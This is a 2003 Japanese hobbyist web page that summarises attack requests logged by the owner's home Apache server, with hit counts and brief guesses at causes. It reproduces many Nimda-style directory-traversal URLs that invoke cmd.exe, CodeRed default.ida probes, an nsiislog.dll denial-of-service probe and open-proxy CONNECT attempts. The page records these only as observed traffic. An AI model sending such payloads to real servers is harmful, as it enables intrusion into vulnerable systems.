楽しみながら攻めつづける！　「山下の部屋」Apacheのログウォッチ　2003年8月1日～2003年9月15日

楽しみながら攻めつづける！
－HONDA '88NSR250R & '94NSR250R SE－

　
山下の部屋　自宅サーバのログを見てみよう

Apacheのログウォッチ　2003年8月1日～2003年9月15日
　
　自宅Webサーバのログ集計です。ちょっとサボって2ヶ月ぶりに集計しまいたが…か・な・り見飽きた感がある？WinサーバーのIISセキュリティを突いた不正アクセスがいつものように多いです。
　
　今回は新たにWindows Mediaサービスに対する ISAPI 拡張欠陥やIIS 4.0/5.0をターゲットとした任意のコマンドを実行可能なセキュリティホールをねらったものがありました。
前回初めて見た、WinNTAutoAttackという新種の攻撃は無くなっていた事にもビックリです（移り変わりが早いですね～）。
　
400：Bad Request

Method	URL	Query	回数	理由
GET	/scripts/..%%35%63../winnt/system32/cmd.exe	/c+dir	27	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%%35c./winnt/system32/cmd.exe	/c+dir	27	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/	-	2	？
POST	/	-	1	？
XXX・・・・（途中略）・・%u00=a		-	1	？

　
404：Not Found

Method	URL	Query	回数	理由
GET	/default.ida	XXXX・・・（途中略）・・・%u00=a	218	「CodeRed」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/_vti_bin/owssvr.dll	UL=1&ACT=4 &BUILD=2614 &STRMVER=4 &CAPREQ=0	45	IE+MS Office環境でWebディスカッション機能がOnだと、リクエストを出すらしい
GET	/MSOffice/cltreq.asp	UL=1&ACT=4 &BUILD=2614 &STRMVER=4 &CAPREQ=0	45	IE+MS Office環境でWebディスカッション機能がOnだと、リクエストを出すらしい
GET	/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe	/c+dir	27	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe	/c+dir	27	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/c/winnt/system32/cmd.exe	/c+dir	27	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/d/winnt/system32/cmd.exe	/c+dir	27	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe	/c+dir	27	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/MSADC/root.exe	/c+dir	27	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%25%35%63../winnt/system32/cmd.exe	/c+dir	27	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%252f../winnt/system32/cmd.exe	/c+dir	27	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%255c../winnt/system32/cmd.exe	/c+dir	27	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%c0%2f../winnt/system32/cmd.exe	/c+dir	27	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%c0%af../winnt/system32/cmd.exe	/c+dir	27	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%c1%1c../winnt/system32/cmd.exe	/c+dir	27	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%c1%9c../winnt/system32/cmd.exe	/c+dir	27	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/root.exe	/c+dir	27	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/deai_bbs/women/search_kinki.cgi	30508	16	？
GET	/scripts/nsiislog.dll	-	12	Windows Mediaサービスに対する ISAPI 拡張欠陥による IIS サービス拒否攻撃
GET	/cgi-bin/mailto:a_yamasita@geocities.co.jp	-	3	？
GET	/%E3%80%80	-	2	？
GET	/scripts/..%255c%255c../winnt/system32/cmd.exe	/c+dir	2	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ
GET	/scripts/..%255c%255c../winnt/system32/cmd.exe	/c+dir	1	「NIMDA」ウイルスから「IIS」のセキュリティホールを突く攻撃の1つ

　
405：Method Not Allowed

Method	URL	Query	回数	理由
POST	/	-	1	POST？
CONNECT	205.188.145.213:80	-	1	80番ポートなので、HTTP？？
CONNECT	smtp-gw-4.msn.com:25	-	1	25番ポートなので、他のmaiｌサーバに接続しようとしてるのかな？
CONNECT	207.46.133.140:21	-	1	21番ポートなので、他のftpサーバに接続しようとしてるのかな？

　
501：Not Implemented

Method	URL	Query	回数	理由
SEARCH	/	-	3	？
get	/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe	/c%20dir	2	IIS 4.0/5.0をターゲットとした任意のコマンドを実行可能なセキュリティホールをつく攻撃みたい
\x04\x01		-	2	AN HTTPDのセキュリティホールをつく攻撃みたい
\x05\x01		-	2	AN HTTPDのセキュリティホールをつく攻撃みたい
y	/	-	1	？

オートバイ超高価買取ならバイク買取専門店パイクワン